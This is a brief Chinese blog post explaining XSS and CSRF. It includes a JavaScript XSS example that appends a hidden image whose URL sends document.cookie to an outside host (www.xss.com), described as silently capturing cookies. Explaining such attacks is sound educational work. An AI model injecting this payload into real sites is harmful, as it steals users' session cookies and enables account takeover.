logo头像

arthas.com.cn

XSS(跨站脚本攻击)和CSRF(跨站请求伪造)

该文章被围观

本文于368天之前发表,文中内容可能已经过时。

XSS是什么?它的全名是:Cross-site scripting,为了和CSS层叠样式表区分所以取名XSS。是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。
而CSRF是什么呢?CSRF全名是Cross-site request forgery,是一种对网站的恶意利用,CSRF比XSS更具危险性。

XSS注入大多数情况下利用了输入框向页面提交恶意代码,比如注入以下代码

1
2
3
4
var img = document.createElement('img');
img.src='http://www.xss.com?cookie='+document.cookie;
img.style.display='none';
document.getElementsByTagName('body')[0].appendChild(img);

神不知鬼不觉的拿到了cookie数据。

原文

上一篇